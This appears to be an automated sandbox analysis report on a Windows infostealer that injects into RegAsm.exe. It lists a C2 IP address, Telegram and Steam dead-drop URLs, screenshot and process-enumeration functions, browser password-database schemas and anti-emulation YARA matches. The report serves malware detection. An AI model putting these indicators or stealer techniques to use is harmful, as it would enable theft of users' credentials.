Source: RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432Content-Disposition:
Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432c84cgle
Source: RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432fold
Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432ing
Source: RegAsm.exe, 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432l
Source: FBKECF.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: FBKECF.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FBKECF.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FBKECF.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: FBKECF.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FBKECF.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FBKECF.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199698764354
Source: RegAsm.exe, 00000002.00000002.3326265923.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/i
Source: RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/r8z0l
Source: RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/r8z0lF
Source: RegAsm.exe, 00000002.00000002.3326265923.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/w
Source: RegAsm.exe, 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: FBKECF.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: FBKECF.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49708 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004120E5 _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

2_2_004120E5

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010080C2	0_2_010080C2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01003530	0_2_01003530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01011583	0_2_01011583
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01000454	0_2_01000454
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100C81A	0_2_0100C81A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100FBE5	0_2_0100FBE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041D079	2_2_0041D079
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041E1F7	2_2_0041E1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041D5CA	2_2_0041D5CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041F6E0	2_2_0041F6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B694CF0	2_2_1B694CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7A9A20	2_2_1B7A9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B682018	2_2_1B682018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B735940	2_2_1B735940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B681C9E	2_2_1B681C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B682AA9	2_2_1B682AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6812A8	2_2_1B6812A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6B1C50	2_2_1B6B1C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7E9CC0	2_2_1B7E9CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B68292D	2_2_1B68292D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B683580	2_2_1B683580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7153B0	2_2_1B7153B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B85D209	2_2_1B85D209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7A5040	2_2_1B7A5040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B699000	2_2_1B699000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B73D6D0	2_2_1B73D6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B729690	2_2_1B729690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7E9430	2_2_1B7E9430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B68D4C0	2_2_1B68D4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B784A60	2_2_1B784A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B68C800	2_2_1B68C800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B681EF1	2_2_1B681EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6BCE10	2_2_1B6BCE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6A8D2A	2_2_1B6A8D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B683AB2	2_2_1B683AB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B708120	2_2_1B708120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7A8030	2_2_1B7A8030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B700090	2_2_1B700090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6A8763	2_2_1B6A8763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6E4760	2_2_1B6E4760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B718760	2_2_1B718760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6A8680	2_2_1B6A8680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7C0480	2_2_1B7C0480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6ABAB0	2_2_1B6ABAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B68251D	2_2_1B68251D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6B7810	2_2_1B6B7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B68290A	2_2_1B68290A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6B3370	2_2_1B6B3370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B68F160	2_2_1B68F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B68174E	2_2_1B68174E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B68AA40	2_2_1B68AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B68EA80	2_2_1B68EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B77A940	2_2_1B77A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B79A900	2_2_1B79A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7669C0	2_2_1B7669C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B68481D	2_2_1B68481D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B7BE800	2_2_1B7BE800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B683E3B	2_2_1B683E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B85AEBE	2_2_1B85AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6E2EE0	2_2_1B6E2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6C6E80	2_2_1B6C6E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6819DD	2_2_1B6819DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B68209F	2_2_1B68209F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B70A0B0	2_2_1B70A0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6966C0	2_2_1B6966C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6AA560	2_2_1B6AA560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B77A590	2_2_1B77A590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1B6847AF	2_2_1B6847AF

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00FFA750 appears 52 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1B683AF3 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1B68395E appears 81 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1B681F5A appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1B8606B1 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004195FA appears 112 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004024D7 appears 312 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1B68415B appears 173 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1B681C2B appears 47 times

Source: file.exe

Static PE information: invalid certificate

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/11@2/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004110AB _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

2_2_004110AB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004114AC _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,

2_2_004114AC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\60JGYAOC.htm

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: IDAEHC.2.dr, HJJKFB.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

